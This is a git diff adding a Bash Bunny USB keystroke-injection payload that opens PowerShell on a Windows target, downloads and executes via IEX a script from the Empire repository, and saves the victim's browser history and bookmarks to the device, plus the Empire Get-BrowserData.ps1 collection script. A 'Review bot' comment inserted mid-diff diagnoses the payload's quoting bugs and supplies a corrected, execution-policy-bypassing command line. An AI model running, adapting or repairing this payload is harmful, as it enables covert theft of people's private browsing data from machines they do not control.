diff --git a/payloads/library/browserData/payload.txt b/payloads/library/browserData/payload.txt
new file mode 100755
index 00000000..8142746c
--- /dev/null
+++ b/payloads/library/browserData/payload.txt
@@ -0,0 +1,37 @@
+exit
+#!/bin/bash
+#
+# Title: BrowserData
+# Author: zachstanford
+# Version: 0.1 (Tested on Windows 10)
+#
+# Dumps browser info like history and bookmarks from powershell script
+# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
+# Credits to this Empire's powershell script:
+# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
+
+#script
+# Blue...............Running Script
+# Purple.............Finished
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R 200
+LOOTDIR=/root/udisk/loot/BrowserData
+mkdir -p $LOOTDIR
+
+ATTACKMODE HID STORAGE
+LED B 200
+
+# wait 6 seconds for the storage to popup
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING powershell "$bunny =(gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter); IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-BrowserData.ps1"); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt;"
+Q ENTER
+Q DELAY 2000
+Q STRING exit
+Q ENTER
+sync
+LED R B 200
\ No newline at end of file
diff --git a/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1 b/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1
new file mode 100755
index 00000000..e202f78f
--- /dev/null
+++ b/payloads/library/powershell scripts/module_source/collection/Get-BrowserData.ps1
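Review bot: The `Q STRING powershell "$bunny =(gwmi …` line is expanded by bash before `Q` ever sees it: `$bunny` and `$env` are almost certainly unset on the Bunny (nothing in this file sets them and they are meant for PowerShell on the target), `\$env` collapses to a literal `$env` with its backslash consumed, and the inner `"` around the URL terminate the bash string, so the keystrokes actually typed begin `powershell  =(gwmi`, contain `downloadstring(https://…)` with no quotes, and end in `Out-File -Append \loot\BrowserData$env:computername.txt` — none of which PowerShell will accept. The same line also fetches and `IEX`es a script from the mutable `master` branch of a third-party repository at run time, even though this commit ships that very script under `payloads/library/powershell scripts/`; whatever is on that branch when the payload fires runs as the victim user, so either dot-source the bundled copy from the Bunny's storage or pin the URL to a commit SHA. A version that escapes the dollars, keeps only single quotes on the PowerShell side (double quotes get stripped by powershell.exe's own argument parsing) and uses the bundled copy would be `Q STRING "powershell -ep bypass -c \$b=(gwmi win32_volume | ? Label -eq BashBunny | % DriveLetter); . (\$b+'\payloads\library\powershell scripts\module_source\collection\Get-BrowserData.ps1'); Get-BrowserInformation | Out-File -Append (\$b+'\loot\BrowserData\'+\$env:computername+'.txt')"` — `-ep bypass` is needed because dot-sourcing a .ps1 is subject to execution policy, and the Windows-side quoting is untested here, so verify the typed command in the Run dialog on a target. Separately, the first line of the file is a bare `exit`, which returns before the shebang is even reached and disables the whole payload; if it is deliberately shipped disarmed, say so, e.g. `# Disabled: delete this line to arm the payload`.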
@@ -0,0 +1,239 @@
+function Get-BrowserInformation {
+<#
+ .SYNOPSIS
+
+ Dumps Browser Information
+ Author: @424f424f
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+ .DESCRIPTION
+
+ Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
+ and/or Firefox browsers on Windows machines.
+
+ .PARAMETER Browser
+
+ The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
+
+ .PARAMETER Datatype
+
+ Type of data to enumerate, 'History' or 'Bookmarks'
+
+ .PARAMETER UserName
+
+ Specific username to search browser information for.
+
+ .PARAMETER Search
+
+ Term to search for
+
+ .EXAMPLE
+
+ PS C:\> Get-BrowserInformation
+
+ Enumerates browser information for all supported browsers for all current users.
+
+ .EXAMPLE
+
+ PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
+
+ Enumerates bookmarks for Internet Explorer for the user 'user1'.
+
+ .EXAMPLE
+
+ PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
+
+ Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
+ results matching the search term 'github'.
+#>
+ [CmdletBinding()]
+ Param
+ (
+ [Parameter(Position = 0)]
+ [String[]]
+ [ValidateSet('Chrome','IE','FireFox', 'All')]
+ $Browser = 'All',
+
+ [Parameter(Position = 1)]
+ [String[]]
+ [ValidateSet('History','Bookmarks','All')]
+ $DataType = 'All',
+
+ [Parameter(Position = 2)]
+ [String]
+ $UserName = '',
+
+ [Parameter(Position = 3)]
+ [String]
+ $Search = ''
+ )
+
+
+
+ function ConvertFrom-Json20([object] $item){
+ #http://stackoverflow.com/a/29689642
+ Add-Type -AssemblyName System.Web.Extensions
+ $ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
+ return ,$ps_js.DeserializeObject($item)
+
+ }
+
+ function Get-ChromeHistory {
+ $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
+ if (-not (Test-Path -Path $Path)) {
+ Write-Verbose "[!] Could not find Chrome History for username: $UserName"
+ }
+ $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+ $Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
+ $Value | ForEach-Object {
+ $Key = $_
+ if ($Key -match $Search){
+ New-Object -TypeName PSObject -Property @{
+ User = $UserName
+ Browser = 'Chrome'
+ DataType = 'History'
+ Data = $_
+ }
+ }
+ }
+ }
+
+ function Get-ChromeBookmarks {
+ $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
+ if (-not (Test-Path -Path $Path)) {
+ Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
+ } else {
+ $Json = Get-Content $Path
+ $Output = ConvertFrom-Json20($Json)
+ $Jsonobject = $Output.roots.bookmark_bar.children
+ $Jsonobject.url |Sort -Unique | ForEach-Object {
+ if ($_ -match $Search) {
+ New-Object -TypeName PSObject -Property @{
+ User = $UserName
+ Browser = 'Firefox'
+ DataType = 'Bookmark'
+ Data = $_
+ }
+ }
+ }
+ }
+ }
+
+ function Get-InternetExplorerHistory {
+ #https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
+
+ $Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
+ $Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+
+ ForEach($Path in $Paths) {
+
+ $User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
+
+ $Path = $Path | Select-Object -ExpandProperty PSPath
+
+ $UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
+ if (-not (Test-Path -Path $UserPath)) {
+ Write-Verbose "[!] Could not find IE History for SID: $Path"
+ }
+ else {
+ Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
+ $Key = $_
+ $Key.GetValueNames() | ForEach-Object {
+ $Value = $Key.GetValue($_)
+ if ($Value -match $Search) {
+ New-Object -TypeName PSObject -Property @{
+ User = $UserName
+ Browser = 'IE'
+ DataType = 'History'
+ Data = $Value
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+
+ function Get-InternetExplorerBookmarks {
+ $URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
+ ForEach ($URL in $URLs) {
+ if ($URL.FullName -match 'Favorites') {
+ $User = $URL.FullName.split('\')[2]
+ Get-Content -Path $URL.FullName | ForEach-Object {
+ try {
+ if ($_.StartsWith('URL')) {
+ # parse the .url body to extract the actual bookmark location
+ $URL = $_.Substring($_.IndexOf('=') + 1)
+
+ if($URL -match $Search) {
+ New-Object -TypeName PSObject -Property @{
+ User = $User
+ Browser = 'IE'
+ DataType = 'Bookmark'
+ Data = $URL
+ }
+ }
+ }
+ }
+ catch {
+ Write-Verbose "Error parsing url: $_"
+ }
+ }
+ }
+ }
+ }
+
+ function Get-FireFoxHistory {
+ $Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
+ if (-not (Test-Path -Path $Path)) {
+ Write-Verbose "[!] Could not find FireFox History for username: $UserName"
+ }
+ else {
+ $Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
+ $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+ $Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
+ $Value.Value |ForEach-Object {
+ if ($_ -match $Search) {
+ ForEach-Object {
+ New-Object -TypeName PSObject -Property @{
+ User = $UserName
+ Browser = 'Firefox'
+ DataType = 'History'
+ Data = $_
+ }
+ }
+ }
+ }
+ }
+ }
+
+ if (!$UserName) {
+ $UserName = "$ENV:USERNAME"
+ }
+
+ if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
+ if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
+ Get-ChromeHistory
+ }
+ if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
+ Get-ChromeBookmarks
+ }
+ }
+
+ if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
+ if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
+ Get-InternetExplorerHistory
+ }
+ if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
+ Get-InternetExplorerBookmarks
+ }
+ }
+
+ if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
+ if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
+ Get-FireFoxHistory
+ }
+ }
+}
\ No newline at end of file